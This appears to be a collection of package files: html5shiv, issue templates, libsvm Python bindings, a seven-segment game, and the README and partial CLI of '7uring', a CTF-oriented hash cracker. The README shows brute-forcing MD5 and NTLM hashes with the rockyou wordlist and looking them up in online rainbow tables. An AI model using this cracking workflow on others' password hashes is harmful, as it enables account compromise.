k,l,m="3.7.3-pre",n=a.html5||{},o=/^<|^(?:button|map|select|textarea|object|iframe|option|optgroup)$/i,p=/^(?:a|b|code|div|fieldset|h1|h2|h3|h4|h5|h6|i|label|li|ol|p|q|span|strong|style|table|tbody|td|th|tr|ul)$/i,q="_html5shiv",r=0,s={};!function(){try{var a=b.createElement("a");a.innerHTML="<xyz></xyz>",k="hidden"in a,l=1==a.childNodes.length||function(){b.createElement("a");var a=b.createDocumentFragment();return"undefined"==typeof a.cloneNode||"undefined"==typeof a.createDocumentFragment||"undefined"==typeof a.createElement}()}catch(c){k=!0,l=!0}}();var t={elements:n.elements||"abbr article aside audio bdi canvas data datalist details dialog figcaption figure footer header hgroup main mark meter nav output picture progress section summary template time video",version:m,shivCSS:n.shivCSS!==!1,supportsUnknownElements:l,shivMethods:n.shivMethods!==!1,type:"default",shivDocument:j,createElement:g,createDocumentFragment:h,addElements:e};a.html5=t,j(b),"object"==typeof module&&module.exports&&(module.exports=t)}("undefined"!=typeof window?window:this,document); | 7Wonder-RL-Lib | /7Wonder-RL-Lib-0.1.1.tar.gz/7Wonder-RL-Lib-0.1.1/docs/_static/js/html5shiv.min.js | html5shiv.min.js |
---
name: Bug report
about: Create a report to help us improve
title: ''
labels: ''
assignees: ''
---
**Describe the bug**
A clear and concise description of what the bug is.
**To Reproduce**
Steps to reproduce the behavior:
1. Go to '...'
2. Click on '....'
3. Scroll down to '....'
4. See error
**Expected behavior**
A clear and concise description of what you expected to happen.
**Screenshots**
If applicable, add screenshots to help explain your problem.
**Desktop (please complete the following information):**
- OS: [e.g. iOS]
- Browser [e.g. chrome, safari]
- Version [e.g. 22]
**Smartphone (please complete the following information):**
- Device: [e.g. iPhone6]
- OS: [e.g. iOS8.1]
- Browser [e.g. stock browser, safari]
- Version [e.g. 22]
**Additional context**
Add any other context about the problem here.
| 7Wonder-RL-Lib | /7Wonder-RL-Lib-0.1.1.tar.gz/7Wonder-RL-Lib-0.1.1/.github/ISSUE_TEMPLATE/bug_report.md | bug_report.md |
---
name: Feature request
about: Suggest an idea for this project
title: ''
labels: ''
assignees: ''
---
**Is your feature request related to a problem? Please describe.**
A clear and concise description of what the problem is. Ex. I'm always frustrated when [...]
**Describe the solution you'd like**
A clear and concise description of what you want to happen.
**Describe alternatives you've considered**
A clear and concise description of any alternative solutions or features you've considered.
**Additional context**
Add any other context or screenshots about the feature request here.
| 7Wonder-RL-Lib | /7Wonder-RL-Lib-0.1.1.tar.gz/7Wonder-RL-Lib-0.1.1/.github/ISSUE_TEMPLATE/feature_request.md | feature_request.md |
from ctypes import *
from ctypes.util import find_library
from os import path
import sys
__all__ = ['libsvm', 'svm_problem', 'svm_parameter',
'toPyModel', 'gen_svm_nodearray', 'print_null', 'svm_node', 'C_SVC',
'EPSILON_SVR', 'LINEAR', 'NU_SVC', 'NU_SVR', 'ONE_CLASS',
'POLY', 'PRECOMPUTED', 'PRINT_STRING_FUN', 'RBF',
'SIGMOID', 'c_double', 'svm_model']
try:
dirname = path.dirname(path.abspath(__file__))
if sys.platform == 'win32':
libsvm = CDLL(path.join(dirname, r'..\windows\libsvm.dll'))
else:
libsvm = CDLL(path.join(dirname, '../libsvm.so'))
except:
# For unix the prefix 'lib' is not considered.
if find_library('svm'):
libsvm = CDLL(find_library('svm'))
elif find_library('libsvm'):
libsvm = CDLL(find_library('libsvm'))
else:
raise Exception('LIBSVM library not found.')
C_SVC = 0
NU_SVC = 1
ONE_CLASS = 2
EPSILON_SVR = 3
NU_SVR = 4
LINEAR = 0
POLY = 1
RBF = 2
SIGMOID = 3
PRECOMPUTED = 4
PRINT_STRING_FUN = CFUNCTYPE(None, c_char_p)
def print_null(s):
return
def genFields(names, types):
return list(zip(names, types))
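# Assign restype/argtypes to a ctypes foreign function in one call.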
def fillprototype(f, restype, argtypes):
f.restype = restype
f.argtypes = argtypes
class svm_node(Structure):
_names = ["index", "value"]
_types = [c_int, c_double]
_fields_ = genFields(_names, _types)
def __str__(self):
return '%d:%g' % (self.index, self.value)
def gen_svm_nodearray(xi, feature_max=None, isKernel=None):
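    # Convert a dense list/tuple or a sparse {index: value} dict into a ctypes
    # svm_node array terminated by index == -1; returns (array, max_index).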
if isinstance(xi, dict):
index_range = xi.keys()
elif isinstance(xi, (list, tuple)):
if not isKernel:
xi = [0] + xi # idx should start from 1
index_range = range(len(xi))
else:
raise TypeError('xi should be a dictionary, list or tuple')
if feature_max:
assert(isinstance(feature_max, int))
index_range = filter(lambda j: j <= feature_max, index_range)
if not isKernel:
index_range = filter(lambda j:xi[j] != 0, index_range)
index_range = sorted(index_range)
ret = (svm_node * (len(index_range)+1))()
ret[-1].index = -1
for idx, j in enumerate(index_range):
ret[idx].index = j
ret[idx].value = xi[j]
max_idx = 0
if index_range:
max_idx = index_range[-1]
return ret, max_idx
class svm_problem(Structure):
_names = ["l", "y", "x"]
_types = [c_int, POINTER(c_double), POINTER(POINTER(svm_node))]
_fields_ = genFields(_names, _types)
def __init__(self, y, x, isKernel=None):
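        # Build the C-side arrays: y as c_double[l] and x as an array of
        # svm_node pointers; x_space is kept on self so the nodes stay alive.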
if len(y) != len(x):
raise ValueError("len(y) != len(x)")
self.l = l = len(y)
max_idx = 0
x_space = self.x_space = []
for i, xi in enumerate(x):
tmp_xi, tmp_idx = gen_svm_nodearray(xi,isKernel=isKernel)
x_space += [tmp_xi]
max_idx = max(max_idx, tmp_idx)
self.n = max_idx
self.y = (c_double * l)()
for i, yi in enumerate(y): self.y[i] = yi
self.x = (POINTER(svm_node) * l)()
for i, xi in enumerate(self.x_space): self.x[i] = xi
class svm_parameter(Structure):
_names = ["svm_type", "kernel_type", "degree", "gamma", "coef0",
"cache_size", "eps", "C", "nr_weight", "weight_label", "weight",
"nu", "p", "shrinking", "probability"]
_types = [c_int, c_int, c_int, c_double, c_double,
c_double, c_double, c_double, c_int, POINTER(c_int), POINTER(c_double),
c_double, c_double, c_int, c_int]
_fields_ = genFields(_names, _types)
def __init__(self, options = None):
        if options is None:
options = ''
self.parse_options(options)
def __str__(self):
s = ''
attrs = svm_parameter._names + list(self.__dict__.keys())
values = map(lambda attr: getattr(self, attr), attrs)
for attr, val in zip(attrs, values):
s += (' %s: %s\n' % (attr, val))
s = s.strip()
return s
def set_to_default_values(self):
        self.svm_type = C_SVC
self.kernel_type = RBF
self.degree = 3
self.gamma = 0
self.coef0 = 0
self.nu = 0.5
self.cache_size = 100
self.C = 1
self.eps = 0.001
self.p = 0.1
self.shrinking = 1
self.probability = 0
self.nr_weight = 0
self.weight_label = (c_int*0)()
self.weight = (c_double*0)()
self.cross_validation = False
self.nr_fold = 0
self.print_func = cast(None, PRINT_STRING_FUN)
def parse_options(self, options):
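        # Accepts either a list of tokens or an option string,
        # e.g. '-s 0 -t 2 -c 1' (the same flags as the svm-train CLI).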
if isinstance(options, list):
argv = options
elif isinstance(options, str):
argv = options.split()
else:
raise TypeError("arg 1 should be a list or a str.")
self.set_to_default_values()
self.print_func = cast(None, PRINT_STRING_FUN)
weight_label = []
weight = []
i = 0
while i < len(argv):
if argv[i] == "-s":
i = i + 1
self.svm_type = int(argv[i])
elif argv[i] == "-t":
i = i + 1
self.kernel_type = int(argv[i])
elif argv[i] == "-d":
i = i + 1
self.degree = int(argv[i])
elif argv[i] == "-g":
i = i + 1
self.gamma = float(argv[i])
elif argv[i] == "-r":
i = i + 1
self.coef0 = float(argv[i])
elif argv[i] == "-n":
i = i + 1
self.nu = float(argv[i])
elif argv[i] == "-m":
i = i + 1
self.cache_size = float(argv[i])
elif argv[i] == "-c":
i = i + 1
self.C = float(argv[i])
elif argv[i] == "-e":
i = i + 1
self.eps = float(argv[i])
elif argv[i] == "-p":
i = i + 1
self.p = float(argv[i])
elif argv[i] == "-h":
i = i + 1
self.shrinking = int(argv[i])
elif argv[i] == "-b":
i = i + 1
self.probability = int(argv[i])
elif argv[i] == "-q":
self.print_func = PRINT_STRING_FUN(print_null)
elif argv[i] == "-v":
i = i + 1
self.cross_validation = 1
self.nr_fold = int(argv[i])
if self.nr_fold < 2:
raise ValueError("n-fold cross validation: n must >= 2")
elif argv[i].startswith("-w"):
i = i + 1
self.nr_weight += 1
nr_weight = self.nr_weight
weight_label += [int(argv[i-1][2:])]
weight += [float(argv[i])]
else:
raise ValueError("Wrong options")
i += 1
libsvm.svm_set_print_string_function(self.print_func)
self.weight_label = (c_int*self.nr_weight)()
self.weight = (c_double*self.nr_weight)()
for i in range(self.nr_weight):
self.weight[i] = weight[i]
self.weight_label[i] = weight_label[i]
class svm_model(Structure):
_names = ['param', 'nr_class', 'l', 'SV', 'sv_coef', 'rho',
'probA', 'probB', 'sv_indices', 'label', 'nSV', 'free_sv']
_types = [svm_parameter, c_int, c_int, POINTER(POINTER(svm_node)),
POINTER(POINTER(c_double)), POINTER(c_double),
POINTER(c_double), POINTER(c_double), POINTER(c_int),
POINTER(c_int), POINTER(c_int), c_int]
_fields_ = genFields(_names, _types)
def __init__(self):
self.__createfrom__ = 'python'
def __del__(self):
# free memory created by C to avoid memory leak
if hasattr(self, '__createfrom__') and self.__createfrom__ == 'C':
libsvm.svm_free_and_destroy_model(pointer(self))
def get_svm_type(self):
return libsvm.svm_get_svm_type(self)
def get_nr_class(self):
return libsvm.svm_get_nr_class(self)
def get_svr_probability(self):
return libsvm.svm_get_svr_probability(self)
def get_labels(self):
nr_class = self.get_nr_class()
labels = (c_int * nr_class)()
libsvm.svm_get_labels(self, labels)
return labels[:nr_class]
def get_sv_indices(self):
total_sv = self.get_nr_sv()
sv_indices = (c_int * total_sv)()
libsvm.svm_get_sv_indices(self, sv_indices)
return sv_indices[:total_sv]
def get_nr_sv(self):
return libsvm.svm_get_nr_sv(self)
def is_probability_model(self):
return (libsvm.svm_check_probability_model(self) == 1)
def get_sv_coef(self):
        return [tuple(self.sv_coef[j][i] for j in range(self.nr_class - 1))
                for i in range(self.l)]
def get_SV(self):
result = []
for sparse_sv in self.SV[:self.l]:
row = dict()
i = 0
while True:
row[sparse_sv[i].index] = sparse_sv[i].value
if sparse_sv[i].index == -1:
break
i += 1
result.append(row)
return result
def toPyModel(model_ptr):
"""
toPyModel(model_ptr) -> svm_model
Convert a ctypes POINTER(svm_model) to a Python svm_model
"""
if bool(model_ptr) == False:
raise ValueError("Null pointer")
m = model_ptr.contents
m.__createfrom__ = 'C'
return m
fillprototype(libsvm.svm_train, POINTER(svm_model), [POINTER(svm_problem), POINTER(svm_parameter)])
fillprototype(libsvm.svm_cross_validation, None, [POINTER(svm_problem), POINTER(svm_parameter), c_int, POINTER(c_double)])
fillprototype(libsvm.svm_save_model, c_int, [c_char_p, POINTER(svm_model)])
fillprototype(libsvm.svm_load_model, POINTER(svm_model), [c_char_p])
fillprototype(libsvm.svm_get_svm_type, c_int, [POINTER(svm_model)])
fillprototype(libsvm.svm_get_nr_class, c_int, [POINTER(svm_model)])
fillprototype(libsvm.svm_get_labels, None, [POINTER(svm_model), POINTER(c_int)])
fillprototype(libsvm.svm_get_sv_indices, None, [POINTER(svm_model), POINTER(c_int)])
fillprototype(libsvm.svm_get_nr_sv, c_int, [POINTER(svm_model)])
fillprototype(libsvm.svm_get_svr_probability, c_double, [POINTER(svm_model)])
fillprototype(libsvm.svm_predict_values, c_double, [POINTER(svm_model), POINTER(svm_node), POINTER(c_double)])
fillprototype(libsvm.svm_predict, c_double, [POINTER(svm_model), POINTER(svm_node)])
fillprototype(libsvm.svm_predict_probability, c_double, [POINTER(svm_model), POINTER(svm_node), POINTER(c_double)])
fillprototype(libsvm.svm_free_model_content, None, [POINTER(svm_model)])
fillprototype(libsvm.svm_free_and_destroy_model, None, [POINTER(POINTER(svm_model))])
fillprototype(libsvm.svm_destroy_param, None, [POINTER(svm_parameter)])
fillprototype(libsvm.svm_check_parameter, c_char_p, [POINTER(svm_problem), POINTER(svm_parameter)])
fillprototype(libsvm.svm_check_probability_model, c_int, [POINTER(svm_model)])
fillprototype(libsvm.svm_set_print_string_function, None, [PRINT_STRING_FUN]) | 7lk_ocr_deploy | /7lk_ocr_deploy-0.1.69.tar.gz/7lk_ocr_deploy-0.1.69/libsvm/svm.py | svm.py |
import os
import sys
from svm import *
from svm import __all__ as svm_all
__all__ = ['evaluations', 'svm_load_model', 'svm_predict', 'svm_read_problem',
'svm_save_model', 'svm_train'] + svm_all
sys.path = [os.path.dirname(os.path.abspath(__file__))] + sys.path
def svm_read_problem(data_file_name):
"""
svm_read_problem(data_file_name) -> [y, x]
Read LIBSVM-format data from data_file_name and return labels y
and data instances x.
"""
prob_y = []
prob_x = []
for line in open(data_file_name):
line = line.split(None, 1)
        # In case of an instance with all-zero features
if len(line) == 1: line += ['']
label, features = line
xi = {}
for e in features.split():
ind, val = e.split(":")
xi[int(ind)] = float(val)
prob_y += [float(label)]
prob_x += [xi]
return (prob_y, prob_x)
def svm_load_model(model_file_name):
"""
svm_load_model(model_file_name) -> model
Load a LIBSVM model from model_file_name and return.
"""
model = libsvm.svm_load_model(model_file_name.encode())
if not model:
print("can't open model file %s" % model_file_name)
return None
model = toPyModel(model)
return model
def svm_save_model(model_file_name, model):
"""
svm_save_model(model_file_name, model) -> None
Save a LIBSVM model to the file model_file_name.
"""
libsvm.svm_save_model(model_file_name.encode(), model)
def evaluations(ty, pv):
"""
evaluations(ty, pv) -> (ACC, MSE, SCC)
Calculate accuracy, mean squared error and squared correlation coefficient
using the true values (ty) and predicted values (pv).
"""
if len(ty) != len(pv):
raise ValueError("len(ty) must equal to len(pv)")
total_correct = total_error = 0
sumv = sumy = sumvv = sumyy = sumvy = 0
for v, y in zip(pv, ty):
if y == v:
total_correct += 1
total_error += (v-y)*(v-y)
sumv += v
sumy += y
sumvv += v*v
sumyy += y*y
sumvy += v*y
l = len(ty)
ACC = 100.0*total_correct/l
MSE = total_error/l
try:
SCC = ((l*sumvy-sumv*sumy)*(l*sumvy-sumv*sumy))/((l*sumvv-sumv*sumv)*(l*sumyy-sumy*sumy))
except:
SCC = float('nan')
return (ACC, MSE, SCC)
def svm_train(arg1, arg2=None, arg3=None):
"""
svm_train(y, x [, options]) -> model | ACC | MSE
svm_train(prob [, options]) -> model | ACC | MSE
svm_train(prob, param) -> model | ACC| MSE
Train an SVM model from data (y, x) or an svm_problem prob using
'options' or an svm_parameter param.
If '-v' is specified in 'options' (i.e., cross validation)
either accuracy (ACC) or mean-squared error (MSE) is returned.
options:
-s svm_type : set type of SVM (default 0)
0 -- C-SVC (multi-class classification)
1 -- nu-SVC (multi-class classification)
2 -- one-class SVM
3 -- epsilon-SVR (regression)
4 -- nu-SVR (regression)
-t kernel_type : set type of kernel function (default 2)
0 -- linear: u'*v
1 -- polynomial: (gamma*u'*v + coef0)^degree
2 -- radial basis function: exp(-gamma*|u-v|^2)
3 -- sigmoid: tanh(gamma*u'*v + coef0)
4 -- precomputed kernel (kernel values in training_set_file)
-d degree : set degree in kernel function (default 3)
-g gamma : set gamma in kernel function (default 1/num_features)
-r coef0 : set coef0 in kernel function (default 0)
-c cost : set the parameter C of C-SVC, epsilon-SVR, and nu-SVR (default 1)
-n nu : set the parameter nu of nu-SVC, one-class SVM, and nu-SVR (default 0.5)
-p epsilon : set the epsilon in loss function of epsilon-SVR (default 0.1)
-m cachesize : set cache memory size in MB (default 100)
-e epsilon : set tolerance of termination criterion (default 0.001)
-h shrinking : whether to use the shrinking heuristics, 0 or 1 (default 1)
-b probability_estimates : whether to train a SVC or SVR model for probability estimates, 0 or 1 (default 0)
-wi weight : set the parameter C of class i to weight*C, for C-SVC (default 1)
-v n: n-fold cross validation mode
-q : quiet mode (no outputs)
"""
prob, param = None, None
if isinstance(arg1, (list, tuple)):
assert isinstance(arg2, (list, tuple))
y, x, options = arg1, arg2, arg3
param = svm_parameter(options)
prob = svm_problem(y, x, isKernel=(param.kernel_type == PRECOMPUTED))
elif isinstance(arg1, svm_problem):
prob = arg1
if isinstance(arg2, svm_parameter):
param = arg2
else:
param = svm_parameter(arg2)
    if prob is None or param is None:
raise TypeError("Wrong types for the arguments")
if param.kernel_type == PRECOMPUTED:
for xi in prob.x_space:
idx, val = xi[0].index, xi[0].value
if xi[0].index != 0:
raise ValueError('Wrong input format: first column must be 0:sample_serial_number')
if val <= 0 or val > prob.n:
raise ValueError('Wrong input format: sample_serial_number out of range')
if param.gamma == 0 and prob.n > 0:
param.gamma = 1.0 / prob.n
libsvm.svm_set_print_string_function(param.print_func)
err_msg = libsvm.svm_check_parameter(prob, param)
if err_msg:
raise ValueError('Error: %s' % err_msg)
if param.cross_validation:
l, nr_fold = prob.l, param.nr_fold
target = (c_double * l)()
libsvm.svm_cross_validation(prob, param, nr_fold, target)
ACC, MSE, SCC = evaluations(prob.y[:l], target[:l])
if param.svm_type in [EPSILON_SVR, NU_SVR]:
print("Cross Validation Mean squared error = %g" % MSE)
print("Cross Validation Squared correlation coefficient = %g" % SCC)
return MSE
else:
print("Cross Validation Accuracy = %g%%" % ACC)
return ACC
else:
m = libsvm.svm_train(prob, param)
m = toPyModel(m)
# If prob is destroyed, data including SVs pointed by m can remain.
m.x_space = prob.x_space
return m
def svm_predict(y, x, m, options=""):
"""
svm_predict(y, x, m [, options]) -> (p_labels, p_acc, p_vals)
Predict data (y, x) with the SVM model m.
options:
-b probability_estimates: whether to predict probability estimates,
0 or 1 (default 0); for one-class SVM only 0 is supported.
-q : quiet mode (no outputs).
The return tuple contains
p_labels: a list of predicted labels
p_acc: a tuple including accuracy (for classification), mean-squared
error, and squared correlation coefficient (for regression).
p_vals: a list of decision values or probability estimates (if '-b 1'
is specified). If k is the number of classes, for decision values,
each element includes results of predicting k(k-1)/2 binary-class
SVMs. For probabilities, each element contains k values indicating
the probability that the testing instance is in each class.
Note that the order of classes here is the same as 'model.label'
field in the model structure.
"""
def info(s):
print(s)
predict_probability = 0
argv = options.split()
i = 0
while i < len(argv):
if argv[i] == '-b':
i += 1
predict_probability = int(argv[i])
elif argv[i] == '-q':
info = print_null
else:
raise ValueError("Wrong options")
i+=1
svm_type = m.get_svm_type()
is_prob_model = m.is_probability_model()
nr_class = m.get_nr_class()
pred_labels = []
pred_values = []
if predict_probability:
if not is_prob_model:
raise ValueError("Model does not support probabiliy estimates")
if svm_type in [NU_SVR, EPSILON_SVR]:
info("Prob. model for test data: target value = predicted value + z,\n"
"z: Laplace distribution e^(-|z|/sigma)/(2sigma),sigma=%g" % m.get_svr_probability());
nr_class = 0
prob_estimates = (c_double * nr_class)()
for xi in x:
xi, idx = gen_svm_nodearray(xi, isKernel=(m.param.kernel_type == PRECOMPUTED))
label = libsvm.svm_predict_probability(m, xi, prob_estimates)
values = prob_estimates[:nr_class]
pred_labels += [label]
pred_values += [values]
else:
if is_prob_model:
info("Model supports probability estimates, but disabled in predicton.")
if svm_type in (ONE_CLASS, EPSILON_SVR, NU_SVC):
nr_classifier = 1
else:
nr_classifier = nr_class*(nr_class-1)//2
dec_values = (c_double * nr_classifier)()
for xi in x:
xi, idx = gen_svm_nodearray(xi, isKernel=(m.param.kernel_type == PRECOMPUTED))
label = libsvm.svm_predict_values(m, xi, dec_values)
if(nr_class == 1):
values = [1]
else:
values = dec_values[:nr_classifier]
pred_labels += [label]
pred_values += [values]
ACC, MSE, SCC = evaluations(y, pred_labels)
l = len(y)
if svm_type in [EPSILON_SVR, NU_SVR]:
info("Mean squared error = %g (regression)" % MSE)
info("Squared correlation coefficient = %g (regression)" % SCC)
else:
info("Accuracy = %g%% (%d/%d) (classification)" % (ACC, int(l*ACC/100), l))
return pred_labels, (ACC, MSE, SCC), pred_values | 7lk_ocr_deploy | /7lk_ocr_deploy-0.1.69.tar.gz/7lk_ocr_deploy-0.1.69/libsvm/svmutil.py | svmutil.py |
from ZeroSeg import Button, screen
from time import sleep
from random import randrange
from threading import Thread
import sys
right_button = Button("right")
left_button = Button("left")
def generate_hurdle() -> int:
"""
Generate random number (0 or 1) and because of it create obstacle
on the top of the map or on the bottom.
"""
rand = randrange(2)
if rand == 1:
return 35 # Top hurdle (stalactite).
else:
return 29 # Bottom hurdle.
class ctx(object):
"""
Game context.
"""
if len(sys.argv) > 1:
difficulty = float(sys.argv[1])
else:
difficulty = 0.3 # More == easier.
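    # Display bytes for the two hero positions (64 = upper segment, 8 = lower segment).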
hero_up = 64
hero_down = 8
hero_position = hero_down
hero_index = 6
hurdles = [generate_hurdle(), generate_hurdle()]
points = 0
game = True
def game_over():
"""
Display game over screen.
"""
ctx.game = False
screen.write_blinking_text(" LOSE ", stop_after=2)
screen.write_text(f"P {ctx.points}")
def draw_hurdles(hurdles_byte: int, position: int):
"""
Simple wrapper function to draw hurdles.
"""
screen.set_byte(hurdles_byte, position)
def draw_hero(position: int, hurdle: int = False) -> bool:
"""
    Draw the hero on the screen at the specified position. If the hero
    collides with a hurdle, draw it under or over the obstacle.
"""
if hurdle: # Draw hero over or under obstacle.
if position == ctx.hero_down and hurdle == 35:
screen.set_byte(43, ctx.hero_index) # 43 - hero under obstacle.
elif position == ctx.hero_up and hurdle == 29:
screen.set_byte(93, ctx.hero_index) # 93 - hero over obstacle.
else:
game_over()
return False
else:
screen.set_byte(position, ctx.hero_index)
return True
def handle_movements():
"""
Handle button presses in other thread.
"""
while ctx.game:
if right_button.pressed():
ctx.hero_position = ctx.hero_up
elif left_button.pressed():
ctx.hero_position = ctx.hero_down
def main():
screen.write_blinking_text(' ' + '.'*5, stop_after=2)
Thread(target=handle_movements, daemon=True).start()
i = 1
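    # i cycles through the 8 digit positions; hurdles[0] is drawn at position i
    # and hurdles[1] trails three positions behind (drawn at i - 3 once i >= 4).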
while True:
screen.clear()
if i > 8:
i = 1
del ctx.hurdles[0]
ctx.hurdles.append(generate_hurdle())
ctx.points += 1
if i != ctx.hero_index:
draw_hurdles(ctx.hurdles[0], i)
draw_hero(ctx.hero_position) # Restore hero on previous position.
if i >= 4:
draw_hurdles(ctx.hurdles[1], i - 3)
if i == ctx.hero_index:
if not (draw_hero(ctx.hero_position, ctx.hurdles[0])):
break
if ctx.points > 0:
if i < 4:
if (ctx.hero_index - 1) + i == ctx.hero_index:
if not (draw_hero(ctx.hero_position, ctx.hurdles[0])):
break
else:
draw_hurdles(ctx.hurdles[0], (ctx.hero_index - 1) + i)
i += 1
sleep(ctx.difficulty)
if __name__ == "__main__":
main() | 7seg-ByteBird | /7seg_ByteBird-0.2-py3-none-any.whl/ByteBird/game.py | game.py |
<h1 align="center">
<br>
<a href="https://github.com/karthikuj/7uring"><img src="https://raw.githubusercontent.com/karthikuj/karthikuj/master/images/7uring.png" alt="7uring" title="7uring"></a>
<br>
7uring: Not your ordinary hashcracker.
<br>
</h1>
## [-] About 7uring:
7uring is an advanced cryptography tool that works with some of the most popular hashes, encodings and ciphers. Its hash functions can check online rainbow tables before you resort to bruteforcing, so hashes are often cracked in a matter of seconds.
In the future, we plan to incorporate steganography, cryptanalysis and much more.
In short, 7uring can take your CTF rank up a notch.
## [-] Installing 7uring:
You can install `7uring` like this:
1. Clone the repository:
```
git clone https://github.com/karthikuj/7uring.git
```
2. Change the directory:
```
cd 7uring/
```
3. Install required modules:
```
python -m pip install -r requirements.txt
```
4. Install the package:
```
pip install .
```
## [-] Using 7uring:
### Syntax:
```
7uring [subcommand] [format] [option] [suboption] data
```
### Subcommands:
```
hash
```
```
cipher
```
```
encoder
```
### Formats:
#### Hash:
```
--blake2b
```
```
--md4
```
```
--md5
```
```
--ntlm
```
```
--sha1
```
```
--sha224
```
```
--sha256
```
```
--sha384
```
```
--sha512
```
```
--whirlpool
```
#### Ciphers:
```
--bacon
```
```
--caesar
```
```
--monoalphabetic
```
```
--morse
```
```
--multitapsms
```
```
--rot13
```
```
--rot47
```
```
--transposition
```
#### Encodings:
```
--binary
```
```
--octal
```
```
--hexadecimal
```
```
--base64
```
#### Options:
To encrypt:
```
--enc
```
To decrypt:
```
--dec
```
To check online rainbow tables (for hashes only!):
```
--rainbow
```
To bruteforce:
```
--brute
```
#### Suboptions:
The only suboption is ```-w```, used to specify a wordlist with ```--brute```.
## [-] Examples:
```
7uring --help
```
```
7uring hash --md5 --enc spongebob
```
```
7uring hash --md5 --rainbow e1964798cfe86e914af895f8d0291812
```
```
7uring cipher --caesar --enc spongebob
```
```
7uring hash --md5 --brute -w /usr/share/wordlists/rockyou.txt e1964798cfe86e914af895f8d0291812
```
## [-] Uninstalling 7uring:
#### Sorry to see you go :(
```
pip uninstall 7uring
```
#### Made with ❤️ by <a href="https://www.instagram.com/5up3r541y4n/" target="_blank">@5up3r541y4n</a>
| 7uring | /7uring-1.0.0.tar.gz/7uring-1.0.0/README.md | README.md |
from turing.programfiles.menu import *
from turing.programfiles.banner import *
import sys
from turing.hashing.hashmd5 import *
from turing.hashing.hashsha512 import *
from turing.hashing.hashsha1 import *
from turing.hashing.hashsha256 import *
from turing.hashing.hashsha224 import *
from turing.hashing.hashsha384 import *
from turing.hashing.hashmd4 import *
from turing.hashing.hashblake2b import *
from turing.hashing.hashwhirlpool import *
from turing.hashing.hashntlm import *
from turing.cipher.caesar import *
from turing.cipher.morse import *
from turing.cipher.rot13 import *
from turing.cipher.transposition import *
from turing.cipher.multitapSMS import *
from turing.cipher.bacon import *
from turing.cipher.monoalphabetic import *
from turing.cipher.rot47 import *
from turing.encoder.binary import *
from turing.encoder.octal import *
from turing.encoder.hexadecimal import *
from turing.encoder.base64 import *
colors = {
'error':'\033[31;1m[x] ',
'success':'\033[36;1m[-] ',
'header':'\033[94;1m',
'msg':'\033[33;1m[o] '
}
def cliPro(argv):
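    """Dispatch CLI arguments of the form:
    7uring <subcommand> <format> <option> [-w <wordlist>] <data>
    """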
printBanner()
if 'hash' in argv and '--brute' in argv and '-w' not in argv:
print('\n' + colors['error'] + 'Wordlist (-w) not specified')
sys.exit()
if 'hash' in argv and '--brute' in argv and '-w' in argv and len(argv) < 7:
        print('\n' + colors['error'] + 'All arguments not specified! '
              '7uring --help for help menu.\n')
sys.exit()
if '--brute' in argv and '-w' in argv and len(argv) >= 7:
wordlist = argv[5]
data = ' '.join(argv[6:])
elif len(argv) >= 5:
data = ' '.join(argv[4:])
if len(argv) < 2:
        print('\n' + colors['error'] + 'No arguments specified! '
              '7uring --help for help menu.\n')
sys.exit()
elif '--help' in argv or '-h' in argv:
printMenu()
elif len(argv) < 5:
        print('\n' + colors['error'] + 'All arguments not specified! '
              '7uring --help for help menu.\n')
sys.exit()
elif argv[1].lower() not in subcommand:
print(colors['error'] + 'Unrecognized subcommand.')
sys.exit()
elif argv[1].lower() == 'hash':
if argv[2].lower() not in hashes:
print(colors['error'] + 'Unrecognized hash type.')
sys.exit()
elif argv[3].lower() not in options:
print(colors['error'] + 'Unrecognized option ' + '\'' + argv[3] + '\'')
sys.exit()
elif argv[2].lower() == '--md5':
if argv[3] == '--enc':
print(colors['success'] + stringToMD5(data))
elif argv[3] == '--dec':
                print(colors['error'] + '\'' + argv[3] + '\'' +
                      ', this option is not for hashes. Use --rainbow or --brute instead.')
sys.exit()
elif argv[3] == '--rainbow':
md5ToString(data)
else:
md5Brute(data, wordlist)
elif argv[2].lower() == '--blake2b':
if argv[3] == '--enc':
print(colors['success'] + stringToBlake2b(data))
elif argv[3] == '--dec':
                print(colors['error'] + '\'' + argv[3] + '\'' +
                      ', this option is not for hashes. Use --rainbow or --brute instead.')
sys.exit()
elif argv[3] == '--rainbow':
blake2bToString(data)
else:
blake2bBrute(data, wordlist)
elif argv[2].lower() == '--md4':
if argv[3] == '--enc':
print(colors['success'] + stringToMD4(data))
elif argv[3] == '--dec':
                print(colors['error'] + '\'' + argv[3] + '\'' +
                      ', this option is not for hashes. Use --rainbow or --brute instead.')
sys.exit()
elif argv[3] == '--rainbow':
md4ToString(data)
else:
md4Brute(data, wordlist)
elif argv[2].lower() == '--ntlm':
if argv[3] == '--enc':
print(colors['success'] + stringToNTLM(data))
elif argv[3] == '--dec':
                print(colors['error'] + '\'' + argv[3] + '\'' +
                      ', this option is not for hashes. Use --rainbow or --brute instead.')
sys.exit()
elif argv[3] == '--rainbow':
ntlmToString(data)
else:
ntlmBrute(data, wordlist)
elif argv[2].lower() == '--sha1':
if argv[3] == '--enc':
print(colors['success'] + stringToSHA1(data))
elif argv[3] == '--dec':
                print(colors['error'] + '\'' + argv[3] + '\'' +
                      ', this option is not for hashes. Use --rainbow or --brute instead.')
sys.exit()
elif argv[3] == '--rainbow':
sha1ToString(data)
else:
sha1Brute(data, wordlist)
elif argv[2].lower() == '--sha224':
if argv[3] == '--enc':
print(colors['success'] + stringToSHA224(data))
elif argv[3] == '--dec':
                print(colors['error'] + '\'' + argv[3] + '\'' +
                      ', this option is not for hashes. Use --rainbow or --brute instead.')
sys.exit()
elif argv[3] == '--rainbow':
sha224ToString(data)
else:
sha224Brute(data, wordlist)
elif argv[2].lower() == '--sha256':
if argv[3] == '--enc':
print(colors['success'] + stringToSHA256(data))
elif argv[3] == '--dec':
                print(colors['error'] + '\'' + argv[3] + '\'' +
                      ', this option is not for hashes. Use --rainbow or --brute instead.')
sys.exit()
elif argv[3] == '--rainbow':
sha256ToString(data)
else:
sha256Brute(data, wordlist)
elif argv[2].lower() == '--sha384':
if argv[3] == '--enc':
print(colors['success'] + stringToSHA384(data))
elif argv[3] == '--dec':
                print(colors['error'] + '\'' + argv[3] + '\'' +
                      ', this option is not for hashes. Use --rainbow or --brute instead.')
sys.exit()
elif argv[3] == '--rainbow':
sha384ToString(data)
else:
sha384Brute(data, wordlist)
elif argv[2].lower() == '--sha512':
if argv[3] == '--enc':
print(colors['success'] + stringToSHA512(data))
elif argv[3] == '--dec':
                print(colors['error'] + '\'' + argv[3] + '\'' +
                      ', this option is not for hashes. Use --rainbow or --brute instead.')
sys.exit()
elif argv[3] == '--rainbow':
sha512ToString(data)
else:
